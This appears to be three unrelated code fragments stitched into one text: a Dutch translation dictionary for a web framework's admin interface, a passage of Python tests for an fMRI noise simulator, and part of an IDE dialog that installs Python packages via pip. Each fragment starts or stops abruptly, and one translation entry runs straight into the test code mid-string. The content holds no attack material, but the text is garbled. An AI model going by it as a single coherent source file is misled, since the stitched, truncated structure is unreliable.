'appadmin is disabled because insecure channel': 'appadmin is uitgezet vanwege een onveilig kanaal',
'application "%s" uninstalled': 'applicatie "%s" gedeïnstalleerd',
'application compiled': 'applicatie gecompileerd',
'application is compiled and cannot be designed': 'applicatie is gecompileerd en kan niet worden ontworpen',
'Are you sure you want to delete file "%s"?': 'Weet je zeker dat je bestand "%s" wilt verwijderen?',
'Are you sure you want to delete this object?': 'Weet je zeker dat je dit object wilt verwijderen?',
'Are you sure you want to uninstall application "%s"?': 'Weet je zeker dat je applicatie "%s" wilt deïnstalleren?',
'ATTENTION: Login requires a secure (HTTPS) connection or running on localhost.': 'LET OP: Login vereist een beveiligde (HTTPS) connectie of moet draaien op localhost.',
'ATTENTION: TESTING IS NOT THREAD SAFE SO DO NOT PERFORM MULTIPLE TESTS CONCURRENTLY.': 'LET OP: TESTEN IS NIET THREAD SAFE, PROBEER NIET GELIJKTIJDIG MEERDERE TESTS TE DOEN.',
'ATTENTION: you cannot edit the running application!': 'LET OP: je kan de applicatie die nu draait niet editen!',
'Authentication': 'Authenticatie',
'Available Databases and Tables': 'Beschikbare databases en tabellen',
'Back': 'Terug',
'Buy this book': 'Koop dit boek',
'Cache': 'Cache',
'cache': 'cache',
'Cache Keys': 'Cache Keys',
'cache, errors and sessions cleaned': 'cache, errors en sessies geleegd',
'Cannot be empty': 'Mag niet leeg zijn',
'Cannot compile: there are errors in your app. Debug it, correct errors and try again.': 'Kan niet compileren: er bevinden zich fouten in je app. Debug, corrigeer de fouten en probeer opnieuw.',
'cannot create file': 'kan bestand niet maken',
'cannot upload file "%(filename)s"': 'kan bestand "%(filename)s" niet uploaden',
'Change Password': '<PASSWORD>',
'Change password': '<PASSWORD>',
'change password': '<PASSWORD>',
'check all': 'vink alles aan',
'Check to delete': 'Vink aan om te verwijderen',
'clean': 'leeg',
'Clear': 'Leeg',
'Clear CACHE?': 'Leeg CACHE?',
'Clear DISK': 'Leeg DISK',
'Clear RAM': 'Clear RAM',
'click to check for upgrades': 'Klik om voor upgrades te controleren',
'Client IP': 'Client IP',
'Community': 'Community',
'compile': 'compileren',
'compiled application removed': 'gecompileerde applicatie verwijderd',
'Components and Plugins': 'Components en Plugins',
'contains': 'bevat',
'Controller': 'Controller',
'Controllers': 'Controllers',
'controllers': 'controllers',
'Copyright': 'Copyright',
'create file with filename:': 'maak bestand met de naam:',
'Create new application': 'Maak nieuwe applicatie:',
'create new application:': 'maak nieuwe applicatie',
'Created By': 'Gemaakt Door',
'Created On': 'Gemaakt Op',
'crontab': 'crontab',
'Current request': 'Huidige request',
'Current response': 'Huidige response',
'Current session': 'Huidige sessie',
'currently saved or': 'op het moment opgeslagen of',
'customize me!': 'pas me aan!',
'data uploaded': 'data geupload',
'Database': 'Database',
'Database %s select': 'Database %s select',
'database administration': 'database administratie',
'Date and Time': 'Datum en Tijd',
'db': 'db',
'DB Model': 'DB Model',
'defines tables': 'definieer tabellen',
'Delete': 'Verwijder',
'delete': 'verwijder',
'delete all checked': 'verwijder alle aangevinkten',
'Delete:': 'Verwijder:',
'Demo': 'Demo',
'Deploy on Google App Engine': 'Deploy op Google App Engine',
'Deployment Recipes': 'Deployment Recepten',
'Description': 'Beschrijving',
'design': 'design',
'DESIGN': 'DESIGN',
'Design for': 'Design voor',
'DISK': 'DISK',
'Disk Cache Keys': 'Disk Cache Keys',
'Disk Cleared': 'Disk Geleegd',
'Documentation': 'Documentatie',
"Don't know what to do?": 'Weet je niet wat je moet doen?',
'done!': 'gereed!',
'Download': 'Download',
'E-mail': 'E-mail',
'E-mail invalid': 'E-mail ongeldig',
'edit': 'bewerk',
'EDIT': 'BEWERK',
'Edit': 'Bewerk',
'Edit application': 'Bewerk applicatie',
'edit controller': 'bewerk controller',
'Edit current record': 'Bewerk huidig record',
'Edit Profile': 'Bewerk Profiel',
'edit profile': 'bewerk profiel',
'Edit This App': 'Bewerk Deze App',
'Editing file': 'Bewerk bestand',
'Editing file "%s"': 'Bewerk bestand "%s"',
'Email and SMS': 'E-mail en SMS',
'enter a number between %(min)g and %(max)g': 'geef een getal tussen %(min)g en %(max)g',
'Enter an integer between %(min)g and %(max)g': 'Enter an integer between %(min)g and %(max)g',
'enter an integer between %(min)g and %(max)g': 'geef een integer tussen %(min)g en %(max)g',
'Error logs for "%(app)s"': 'Error logs voor "%(app)s"',
'errors': 'errors',
'Errors': 'Errors',
'Export': 'Export',
'export as csv file': 'exporteer als csv-bestand',
'exposes': 'stelt bloot',
'extends': 'extends',
'failed to reload module': 'niet gelukt om module te herladen',
'False': 'Onwaar',
'FAQ': 'FAQ',
'file "%(filename)s" created': 'bestand "%(filename)s" gemaakt',
'file "%(filename)s" deleted': 'bestand "%(filename)s" verwijderd',
'file "%(filename)s" uploaded': 'bestand "%(filename)s" geupload',
'file "%(filename)s" was not deleted': 'bestand "%(filename)s" was niet verwijderd',
'file "%s" of %s restored': 'bestand "%s" van %s hersteld',
'file changed on disk': 'bestand aangepast op schijf',
'file does not exist': 'bestand bestaat niet',
'file saved on %(time)s': 'bestand bewaard op %(time)s',
'file saved on %s': 'bestand bewaard op %s',
'First name': 'Voornaam',
'Forbidden': 'Verboden',
'Forms and Validators': 'Formulieren en Validators',
'Free Applications': 'Gratis Applicaties',
'Functions with no doctests will result in [passed] tests.': 'Functies zonder doctests zullen resulteren in [passed] tests.',
'Group %(group_id)s created': 'Groep %(group_id)s gemaakt',
'Group ID': 'Groep ID',
'Group uniquely assigned to user %(id)s': 'Groep is uniek toegekend aan gebruiker %(id)s',
'Groups': 'Groepen',
'Hello World': '<NAME>',
'help': 'help',
'Home': 'Home',
'How did you get here?': 'Hoe ben je hier gekomen?',
'htmledit': 'Bewerk HTML',
'import': 'import',
'Import/Export': 'Import/Export',
'includes': 'includes',
'Index': 'Index',
'insert new': 'voeg nieuwe',
'insert new %s': 'voeg nieuwe %s',
'Installed applications': 'Geïnstalleerde applicaties',
'internal error': 'interne error',
'Internal State': 'Interne State',
'Introduction': 'Introductie',
'Invalid action': 'Ongeldige actie',
'Invalid email': 'Ongeldig emailadres',
'invalid password': '<PASSWORD>',
'Invalid password': '<PASSWORD>',
'Invalid Query': 'Ongeldige Query',
'invalid request': 'ongeldige request',
'invalid ticket': 'ongeldige ticket',
'Is Active': 'Is Actief',
'Key': 'Key',
'language file "%(filename)s" created/updated': 'taalbestand "%(filename)s" gemaakt/geupdate',
'Language files (static strings) updated': 'Taalbestanden (statische strings) geupdate',
'languages': 'talen',
'Languages': 'Talen',
'languages updated': 'talen geupdate',
'Last name': 'Achternaam',
'Last saved on:': 'Laatst bewaard op:',
'Layout': 'Layout',
'Layout Plugins': 'Layout Plugins',
'Layouts': 'Layouts',
'License for': 'Licentie voor',
'Live Chat': 'Live Chat',
'loading...': 'laden...',
'Logged in': 'Ingelogd',
'Logged out': 'Uitgelogd',
'Login': 'Login',
'login': 'login',
'Login to the Administrative Interface': 'Inloggen op de Administratieve Interface',
'logout': 'logout',
'Logout': 'Logout',
'Lost Password': '<PASSWORD>',
'Lost password?': 'Wachtwoord kwijt?',
'Main Menu': 'Hoofdmenu',
'Manage Cache': 'Beheer Cache',
'Menu Model': 'Menu Model',
'merge': 'samenvoegen',
'Models': 'Modellen',
'models': 'modellen',
'Modified By': 'Aangepast Door',
'Modified On': 'Aangepast Op',
'Modules': 'Modules',
'modules': 'modules',
'My Sites': 'Mijn Sites',
'Name': 'Naam',
'New': 'Nieuw',
'new application "%s" created': 'nieuwe applicatie "%s" gemaakt',
'New password': '<PASSWORD>',
'New Record': 'Nieuw Record',
'new record inserted': 'nieuw record ingevoegd',
'next 100 rows': 'volgende 100 rijen',
'NO': 'NEE',
'No databases in this application': 'Geen database in deze applicatie',
'Object or table name': 'Object of tabelnaam',
'Old password': '<PASSWORD>',
'Online examples': 'Online voorbeelden',
'Or': 'Of',
'or import from csv file': 'of importeer van csv-bestand',
'or provide application url:': 'of geef een applicatie url:',
'Origin': 'Bron',
'Original/Translation': 'Oorspronkelijk/Vertaling',
'Other Plugins': 'Andere Plugins',
'Other Recipes': 'Andere Recepten',
'Overview': 'Overzicht',
'pack all': 'pack all',
'pack compiled': 'pack compiled',
'Password': '<PASSWORD>',
"Password fields don't match": 'Wachtwoordvelden komen niet overeen',
'Peeking at file': 'Naar bestand aan het gluren',
'please input your password again': 'geef alstublieft nogmaals uw wachtwoord',
'Plugins': 'Plugins',
'Powered by': 'Powered by',
'Preface': 'Inleiding',
'previous 100 rows': 'vorige 100 rijen',
'Profile': 'Profiel',
'Python': 'Python',
'Query': 'Query',
'Query:': 'Query:',
'Quick Examples': 'Snelle Voorbeelden',
'RAM': 'RAM',
'RAM Cache Keys': 'RAM Cache Keys',
'Ram Cleared': 'Ram Geleegd',
'Recipes': 'Recepten',
'Record': 'Record',
'record does not exist': 'record bestaat niet',
'Record ID': 'Record ID',
'Record id': 'Record id',
'register': 'registreer',
'Register': 'Registreer',
'Registration identifier': 'Registratie identifier',
'Registration key': 'Registratie sleutel',
'Registration successful': 'Registratie succesvol',
'Remember me (for 30 days)': 'Onthoudt mij (voor 30 dagen)',
'remove compiled': 'verwijder gecompileerde',
'Request reset password': '<PASSWORD>',
'Reset Password key': 'Reset Wachtwoord sleutel',
'Resolve Conflict file': 'Los Conflictbestand op',
'restore': 'herstel',
'revert': 'herstel',
'Role': 'Rol',
'Rows in Table': 'Rijen in tabel',
'Rows selected': 'Rijen geselecteerd',
'save': 'bewaar',
'Save profile': 'Bewaar profiel',
'Saved file hash:': 'Opgeslagen file hash:',
'Search': 'Zoek',
'Semantic': 'Semantisch',
'Services': 'Services',
'session expired': 'sessie verlopen',
'shell': 'shell',
'site': 'site',
'Size of cache:': 'Grootte van cache:',
'some files could not be removed': 'sommige bestanden konden niet worden verwijderd',
'starts with': 'begint met',
'state': 'state',
'static': 'statisch',
'Static files': 'Statische bestanden',
'Statistics': 'Statistieken',
'Stylesheet': 'Stylesheet',
'Submit': 'Submit',
'submit': 'submit',
'Support': 'Support',
'Sure you want to delete this object?': 'Weet je zeker dat je dit object wilt verwijderen?',
'Table': 'Tabel',
'Table name': 'Tabelnaam',
'test': 'test',
'Testing application': 'Applicatie testen',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'De "query" is een conditie zoals | |
signal_function = sim.convolve_hrf(stimfunction=stimfunction,
tr_duration=tr_duration,
)
# Convolve the HRF with the stimulus sequence
signal = sim.apply_signal(signal_function=signal_function,
volume_signal=volume,
)
# Generate the mask of the signal
mask, template = sim.mask_brain(signal,
mask_self=None)
assert min(mask[mask > 0]) > 0.1, "Mask thresholding did not work"
assert len(np.unique(template) > 2), "Template creation did not work"
stimfunction_tr = stimfunction[::int(tr_duration * 100)]
# Create the noise volumes (using the default parameters)
noise = sim.generate_noise(dimensions=dimensions,
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template,
mask=mask,
iterations=[1, 0],
)
assert signal.shape == noise.shape, "The dimensions of signal and noise " \
"the same"
noise_high = sim.generate_noise(dimensions=dimensions,
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template,
mask=mask,
noise_dict={'sfnr': 50, 'snr': 25},
iterations=[1, 0],
)
noise_low = sim.generate_noise(dimensions=dimensions,
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template,
mask=mask,
noise_dict={'sfnr': 100, 'snr': 25},
iterations=[1, 0],
)
system_high = np.std(noise_high[mask > 0], 1).mean()
system_low = np.std(noise_low[mask > 0], 1).mean()
assert system_low < system_high, "SFNR noise could not be manipulated"
# Check that you check for the appropriate template values
with pytest.raises(ValueError):
sim.generate_noise(dimensions=dimensions,
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template * 2,
mask=mask,
noise_dict={},
)
# Check that iterations does what it should
sim.generate_noise(dimensions=dimensions,
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template,
mask=mask,
noise_dict={},
iterations=[0, 0],
)
sim.generate_noise(dimensions=dimensions,
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template,
mask=mask,
noise_dict={},
iterations=None,
)
# Test drift noise
trs = 1000
period = 100
drift = sim._generate_noise_temporal_drift(trs,
tr_duration,
'sine',
period,
)
# Check that the max frequency is the appropriate frequency
power = abs(np.fft.fft(drift))[1:trs // 2]
freq = np.linspace(1, trs // 2 - 1, trs // 2 - 1) / trs
period_freq = np.where(freq == 1 / (period // tr_duration))
max_freq = np.argmax(power)
assert period_freq == max_freq, 'Max frequency is not where it should be'
# Do the same but now with cosine basis functions, answer should be close
drift = sim._generate_noise_temporal_drift(trs,
tr_duration,
'discrete_cos',
period,
)
# Check that the appropriate frequency is peaky (may not be the max)
power = abs(np.fft.fft(drift))[1:trs // 2]
freq = np.linspace(1, trs // 2 - 1, trs // 2 - 1) / trs
period_freq = np.where(freq == 1 / (period // tr_duration))[0][0]
assert power[period_freq] > power[period_freq + 1], 'Power is low'
assert power[period_freq] > power[period_freq - 1], 'Power is low'
# Check it gives a warning if the duration is too short
drift = sim._generate_noise_temporal_drift(50,
tr_duration,
'discrete_cos',
period,
)
# Test physiological noise (using unrealistic parameters so that it's easy)
timepoints = list(np.linspace(0, (trs - 1) * tr_duration, trs))
resp_freq = 0.2
heart_freq = 1.17
phys = sim._generate_noise_temporal_phys(timepoints,
resp_freq,
heart_freq,
)
# Check that the max frequency is the appropriate frequency
power = abs(np.fft.fft(phys))[1:trs // 2]
freq = np.linspace(1, trs // 2 - 1, trs // 2 - 1) / (trs * tr_duration)
peaks = (power > (power.mean() + power.std())) # Where are the peaks
peak_freqs = freq[peaks]
assert np.any(resp_freq == peak_freqs), 'Resp frequency not found'
assert len(peak_freqs) == 2, 'Two peaks not found'
# Test task noise
sim._generate_noise_temporal_task(stimfunction_tr,
motion_noise='gaussian',
)
sim._generate_noise_temporal_task(stimfunction_tr,
motion_noise='rician',
)
# Test ARMA noise
with pytest.raises(ValueError):
noise_dict = {'fwhm': 4, 'auto_reg_rho': [1], 'ma_rho': [1, 1]}
sim._generate_noise_temporal_autoregression(stimfunction_tr,
noise_dict,
dimensions,
mask,
)
# Generate spatial noise
vol = sim._generate_noise_spatial(np.array([10, 10, 10, trs]))
assert len(vol.shape) == 3, 'Volume was not reshaped to ignore TRs'
# Switch some of the noise types on
noise_dict = dict(physiological_sigma=1, drift_sigma=1, task_sigma=1,
auto_reg_sigma=0)
sim.generate_noise(dimensions=dimensions,
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template,
mask=mask,
noise_dict=noise_dict,
iterations=[0, 0],
)
def test_generate_noise_spatial():
# Set up the inputs
dimensions = np.array([10, 5, 10])
mask = np.ones(dimensions)
vol = sim._generate_noise_spatial(dimensions, mask)
# Run the analysis from _calc_FHWM but for th elast step of aggregating
# across dimensions
v_count = 0
v_sum = 0
v_sq = 0
d_sum = [0.0, 0.0, 0.0]
d_sq = [0.0, 0.0, 0.0]
d_count = [0, 0, 0]
# Pull out all the voxel coordinates
coordinates = list(product(range(dimensions[0]),
range(dimensions[1]),
range(dimensions[2])))
# Find the sum of squared error for the non-masked voxels in the brain
for i in list(range(len(coordinates))):
# Pull out this coordinate
x, y, z = coordinates[i]
# Is this within the mask?
if mask[x, y, z] > 0:
# Find the the volume sum and squared values
v_count += 1
v_sum += vol[x, y, z]
v_sq += vol[x, y, z] ** 2
# Get the volume variance
v_var = (v_sq - ((v_sum ** 2) / v_count)) / (v_count - 1)
for i in list(range(len(coordinates))):
# Pull out this coordinate
x, y, z = coordinates[i]
# Is this within the mask?
if mask[x, y, z] > 0:
# For each xyz dimension calculate the squared
# difference of this voxel and the next
in_range = (x < dimensions[0] - 1)
in_mask = in_range and (mask[x + 1, y, z] > 0)
included = in_mask and (~np.isnan(vol[x + 1, y, z]))
if included:
d_sum[0] += vol[x, y, z] - vol[x + 1, y, z]
d_sq[0] += (vol[x, y, z] - vol[x + 1, y, z]) ** 2
d_count[0] += 1
in_range = (y < dimensions[1] - 1)
in_mask = in_range and (mask[x, y + 1, z] > 0)
included = in_mask and (~np.isnan(vol[x, y + 1, z]))
if included:
d_sum[1] += vol[x, y, z] - vol[x, y + 1, z]
d_sq[1] += (vol[x, y, z] - vol[x, y + 1, z]) ** 2
d_count[1] += 1
in_range = (z < dimensions[2] - 1)
in_mask = in_range and (mask[x, y, z + 1] > 0)
included = in_mask and (~np.isnan(vol[x, y, z + 1]))
if included:
d_sum[2] += vol[x, y, z] - vol[x, y, z + 1]
d_sq[2] += (vol[x, y, z] - vol[x, y, z + 1]) ** 2
d_count[2] += 1
# Find the variance
d_var = np.divide((d_sq - np.divide(np.power(d_sum, 2),
d_count)), (np.add(d_count, -1)))
o_var = np.divide(-1, (4 * np.log(1 - (0.5 * d_var / v_var))))
fwhm3 = np.sqrt(o_var) * 2 * np.sqrt(2 * np.log(2))
# Calculate the proportion of std relative to the mean
std_proportion = np.nanstd(fwhm3) / np.nanmean(fwhm3)
print(fwhm3)
assert std_proportion < 0.25, 'Variance is inconsistent across dim'
def test_mask_brain():
# Inputs for generate_signal
dimensions = np.array([10, 10, 10]) # What is the size of the brain
feature_size = [2]
feature_type = ['cube']
feature_coordinates = np.array(
[[4, 4, 4]])
signal_magnitude = [30]
# Generate a volume representing the location and quality of the signal
volume = sim.generate_signal(dimensions=dimensions,
feature_coordinates=feature_coordinates,
feature_type=feature_type,
feature_size=feature_size,
signal_magnitude=signal_magnitude,
)
# Mask the volume to be the same shape as a brain
mask, _ = sim.mask_brain(dimensions, mask_self=None,)
brain = volume * mask
assert np.sum(brain != 0) == np.sum(volume != 0), "Masking did not work"
assert brain[0, 0, 0] == 0, "Masking did not work"
assert brain[4, 4, 4] != 0, "Masking did not work"
feature_coordinates = np.array(
[[1, 1, 1]])
volume = sim.generate_signal(dimensions=dimensions,
feature_coordinates=feature_coordinates,
feature_type=feature_type,
feature_size=feature_size,
signal_magnitude=signal_magnitude,
)
# Mask the volume to be the same shape as a brain
mask, _ = sim.mask_brain(dimensions, mask_self=None, )
brain = volume * mask
assert np.sum(brain != 0) < np.sum(volume != 0), "Masking did not work"
# Test that you can load the default
dimensions = np.array([100, 100, 100])
mask, template = sim.mask_brain(dimensions, mask_self=False)
assert mask[20, 80, 50] == 0, 'Masking didn''t work'
assert mask[25, 80, 50] == 1, 'Masking didn''t work'
assert int(template[25, 80, 50] * 100) == 57, 'Template not correct'
# Check that you can mask self
mask_self, template_self = sim.mask_brain(template, mask_self=True)
assert (template_self - template).sum() < 1e2, 'Mask self error'
assert (mask_self - mask).sum() == 0, 'Mask self error'
def test_calc_noise():
# Inputs for functions
onsets = [10, 30, 50, 70, 90]
event_durations = [6]
tr_duration = 2
duration = 200
temporal_res = 100
tr_number = int(np.floor(duration / tr_duration))
dimensions_tr = np.array([10, 10, 10, tr_number])
# Preset the noise dict
nd_orig = sim._noise_dict_update({})
# Create the time course for the signal to be generated
stimfunction = sim.generate_stimfunction(onsets=onsets,
event_durations=event_durations,
total_time=duration,
temporal_resolution=temporal_res,
)
# Mask the volume to be the same shape as a brain
mask, template = sim.mask_brain(dimensions_tr, mask_self=None)
stimfunction_tr = stimfunction[::int(tr_duration * temporal_res)]
nd_orig['matched'] = 0
noise = sim.generate_noise(dimensions=dimensions_tr[0:3],
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template,
mask=mask,
noise_dict=nd_orig,
)
# Check the spatial noise match
nd_orig['matched'] | |
# -*- coding: utf-8 -*-
from noval import _,GetApp
from tkinter import ttk
from tkinter import messagebox,filedialog
import tkinter as tk
import noval.ui_base as ui_base
import noval.python.interpreter.interpretermanager as interpretermanager
import os
import subprocess
import noval.outputthread as outputthread
import threading
import noval.util.strutils as strutils
import noval.util.apputils as sysutils
import noval.util.utils as utils
import time
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
import noval.consts as consts
import noval.ttkwidgets.treeviewframe as treeviewframe
import noval.editor.text as texteditor
import noval.util.urlutils as urlutils
import noval.python.parser.utils as parserutils
import noval.constants as constants
import noval.ttkwidgets.textframe as textframe
import noval.util.compat as compat
import noval.util.fileutils as fileutils
from dummy.userdb import UserDataDb
import noval.ui_utils as ui_utils
def url_parse_host(url):
'''
解析url中的host
'''
parts = urlparse(url)
host = parts.netloc
return host
def get_package_versions(name):
'''
'''
# Fetch info from novalide server
api_addr = '%s/member/get_package' % (UserDataDb.HOST_SERVER_ADDR)
data = utils.RequestData(api_addr,method='get',arg={'name':name})
if not data:
#未能从服务器上找到包
return []
else:
return sorted(data['releases'])
class PackageActionChoiceDialog(ui_base.CommonModaldialog):
'''
检查到安装包时包已经存在,提示用户可供选择的几个操作选项对话框
'''
#重新安装
REINSTALL = 0
#安装最新版本
UPDATE_LATEST = 1
#安装指定版本
UPDATE_SPECIFIED = 2
def __init__(self, master,pkg_name):
ui_base.CommonModaldialog.__init__(self, master, takefocus=1)
self.title(_("Package '%s' installed")%pkg_name)
#禁止对话框改变大小
label_ctrl = ttk.Label(self.main_frame,text=_("Please choose the action you want:"))
label_ctrl.pack(expand=1, fill="x",padx = consts.DEFAUT_CONTRL_PAD_X,pady = consts.DEFAUT_CONTRL_PAD_Y)
self.choice_chkvar = tk.IntVar(value=self.UPDATE_LATEST)
sizer_frame = ttk.Frame(self.main_frame)
sizer_frame.pack(fill="x",padx=consts.DEFAUT_CONTRL_PAD_X)
self.reinstall_radiobutton = ttk.Radiobutton( sizer_frame, text=_("Reinstall"),value = self.REINSTALL,variable=self.choice_chkvar)
self.reinstall_radiobutton.pack(fill="x",pady=(consts.DEFAUT_CONTRL_PAD_Y, 0))
self.update_latest_radiobutton = ttk.Radiobutton(sizer_frame, text=_("Update to latest version"),value = self.UPDATE_LATEST,variable=self.choice_chkvar)
self.update_latest_radiobutton.pack(fill="x")
self.update_specified_radiobutton = ttk.Radiobutton(sizer_frame, text=_("Update to specified version"),value = self.UPDATE_SPECIFIED,variable=self.choice_chkvar)
self.update_specified_radiobutton.pack(fill="x")
separator = ttk.Separator (self.main_frame, orient = tk.HORIZONTAL)
separator.pack(expand=1, fill="x",padx=consts.DEFAUT_CONTRL_PAD_X,pady = (consts.DEFAUT_CONTRL_PAD_Y,0))
self.AddokcancelButton()
class CommonManagePackagesDialog(ui_base.CommonModaldialog):
def __init__(self,parent,title,interpreter,interpreters,pkg_name,pkg_args='',autorun=False,call_back=None):
ui_base.CommonModaldialog.__init__(self,parent)
self.title(title)
#包安装的解释器
#解释器列表
self.interpreter = interpreter
self.interpreters = interpreters
#包名称
self.pkg_name = pkg_name
#参数
self.pkg_args = pkg_args
#是否自动运行
self.autorun = autorun
#执行完成后的回调函数
self.end_callback = call_back
def CreateWidgets(self,row_no,interpreter_lablel,pkg_args_label,extra_label):
row = ttk.Frame(self.main_frame)
ttk.Label(row,text=interpreter_lablel).pack(side=tk.LEFT,pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
names = self.GetNames()
self.interpreter_name_var = tk.StringVar(value=self.interpreter.Name)
self._interpreterCombo = ttk.Combobox(row,values=names,textvariable=self.interpreter_name_var,state="readonly")
self._interpreterCombo.pack(side=tk.LEFT,pady=(consts.DEFAUT_CONTRL_PAD_Y,0),fill="x",expand=1,padx=(consts.DEFAUT_CONTRL_PAD_X,0))
row.grid(row=row_no,column=0,padx=consts.DEFAUT_CONTRL_PAD_X,sticky=tk.EW)
row_no += 1
label_1 = ttk.Label(self.main_frame, text=pkg_args_label)
label_1.grid(row=row_no,column=0,pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=consts.DEFAUT_CONTRL_PAD_X,sticky=tk.EW)
row_no += 1
row = ttk.Frame(self.main_frame)
self.args_var = tk.StringVar(value=self.pkg_args)
self.args_ctrl = ttk.Entry(row,textvariable=self.args_var)
self.args_ctrl.pack(side=tk.LEFT,pady=(consts.DEFAUT_CONTRL_PAD_Y,0),fill="x",expand=1)
self.args_ctrl.bind("<Return>", self._ok, False)
self.browser_btn = ttk.Button(row, text=_("Browse..."),command=self.BrowsePath)
self.browser_btn.pack(side=tk.LEFT,pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=(consts.DEFAUT_CONTRL_PAD_X,0))
row.grid(row=row_no,column=0,padx=consts.DEFAUT_CONTRL_PAD_X,sticky=tk.EW)
row_no += 1
label_2 = ttk.Label(self.main_frame, text=extra_label)
label_2.grid(row=row_no,column=0,pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=consts.DEFAUT_CONTRL_PAD_X,sticky=tk.EW)
row_no += 1
self.text_frame = textframe.TextFrame(self.main_frame,borderwidth=1,relief="solid",text_class=texteditor.TextCtrl)
self.output_ctrl = self.text_frame.text
#这里需要设置高亮属性为False否则会在安装取消时抛出异常
self.output_ctrl.SetTagCurrentLine(False)
self.output_ctrl['state'] = tk.DISABLED
self.detail_output_row = row_no
self.text_frame.grid(row=row_no,column=0,padx=consts.DEFAUT_CONTRL_PAD_X,sticky=tk.NSEW)
row_no += 1
self.bottom_frame = ttk.Frame(self.main_frame)
self.detail_btn = ttk.Button(self.bottom_frame, text=_("Show Details") + "↓",command=self.ShowHideDetails)
self.detail_btn.pack(side=tk.LEFT,pady=consts.DEFAUT_CONTRL_PAD_Y,padx=consts.DEFAUT_CONTRL_PAD_X)
self._show_details = False
self.AddokcancelButton()
self.bottom_frame.grid(row=row_no,column=0,sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.main_frame.columnconfigure(0, weight=1)
self.ShowHideDetails()
def ShowHideDetails(self):
if not self._show_details:
self.detail_btn.configure( text=_("Show Details") + "↓")
self.text_frame.grid_forget()
self._show_details = True
else:
self.text_frame.grid(row=self.detail_output_row,column=0,padx=consts.DEFAUT_CONTRL_PAD_X,sticky=tk.NSEW)
self.detail_btn.configure( text=_("Hide Details") + "↑")
self._show_details = False
def BrowsePath(self):
descrs = [(_("Text File"),".txt"),]
title = _("Choose requirements.txt")
path = filedialog.askopenfilename(master=self,title=title ,
filetypes = descrs,
initialfile= "requirements.txt"
)
if not path:
return
self.GetInterpreter()
self.SetRequirementsArgs(path)
def SetRequirementsArgs(self,path):
''''''
def AddokcancelButton(self):
button_frame = ttk.Frame(self.bottom_frame)
button_frame.pack(padx=(consts.DEFAUT_CONTRL_PAD_X,0),fill="x",pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
self.AppendokcancelButton(button_frame)
def ExecCommandAndOutput(self,command,dlg):
#shell must be True on linux
p = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
stdout_thread = outputthread.OutputThread(p.stdout,p,dlg,call_after=True)
stdout_thread.start()
stderr_thread = outputthread.OutputThread(p.stderr,p,dlg,call_after=True)
stderr_thread.start()
p.wait()
self.EndDialog(p.returncode)
#界面关闭了但是多线程仍在运行操作界面控件,这里需要统一捕获tk异常
@ui_utils.capture_tclerror
def AppendText(self,content):
self.output_ctrl['state'] = tk.NORMAL
self.output_ctrl.set_read_only(False)
if utils.is_py3_plus():
content = compat.ensure_string(content)
self.output_ctrl.insert(tk.END,content)
self.output_ctrl.set_read_only(True)
self.output_ctrl['state'] = tk.DISABLED
def GetNames(self):
names = []
for interpreter in self.interpreters:
names.append(interpreter.Name)
return names
def GetInterpreter(self):
sel = self._interpreterCombo.current()
self.interpreter = self.interpreters[sel]
def _ok(self,event=None):
if self.args_var.get().strip() == "":
messagebox.showinfo(GetApp().GetAppName(),_("package name is empty"))
return False
self.GetInterpreter()
if self.interpreter.IsBuiltIn or self.interpreter.GetPipPath() is None:
messagebox.showerror(GetApp().GetAppName(),_("Could not find pip on the path"))
return False
self.EnableButton(enable=False)
return True
def EnableButton(self,enable=True):
if enable:
self.args_ctrl['state'] = tk.NORMAL
self.ok_button['state'] = tk.NORMAL
else:
self.args_ctrl['state'] = tk.DISABLED
self.ok_button['state'] = tk.DISABLED
def run(self):
pass
def auto_run(self):
if not self.autorun:
return
self._ok()
def GetPackageName(self):
#包名称为空,获取输入参数是否为包名称
pkg_name = self.pkg_name
if not pkg_name:
args_name = self.args_var.get().strip()
#输入参数没有空格,则输入为包名称
if args_name.find(" ") == -1:
pkg_name = args_name
return pkg_name
class InstallPackagesDialog(CommonManagePackagesDialog):
SOURCE_LIST = [
"https://pypi.org/simple",
"https://pypi.tuna.tsinghua.edu.cn/simple",
"http://mirrors.aliyun.com/pypi/simple",
"https://pypi.mirrors.ustc.edu.cn/simple",
"http://pypi.hustunique.com",
"http://pypi.sdutlinux.org",
"http://pypi.douban.com/simple"
]
BEST_PIP_SOURCE = None
def __init__(self,parent,interpreter,interpreters=interpretermanager.InterpreterManager().interpreters,pkg_name='',install_args='',autorun=False,install_update=False,call_back=None):
CommonManagePackagesDialog.__init__(self,parent,_("Install Package"),interpreter,interpreters,pkg_name,install_args,autorun,call_back)
self.SOURCE_NAME_LIST = [
_('Default Source'),
_('Tsinghua'),
_('Aliyun'),
_('USTC'),
_('HUST'),
_('SDUT'),
_('Douban'),
]
#是否更新安装
self.install_update = install_update
row = ttk.Frame(self.main_frame)
ttk.Label(row,text=_("We will use the pip source:")).pack(side=tk.LEFT,pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
self._pipSourceCombo = ttk.Combobox(row, values=self.SOURCE_NAME_LIST,state="readonly")
self._pipSourceCombo.current(0)
self._pipSourceCombo.pack(side=tk.LEFT,pady=(consts.DEFAUT_CONTRL_PAD_Y,0),fill="x",expand=1)
self.check_source_btn = ttk.Button(row, text= _("Check the best source"),command=self.CheckTheBestSource)
self.check_source_btn.pack(side=tk.LEFT,pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=(consts.DEFAUT_CONTRL_PAD_X,0))
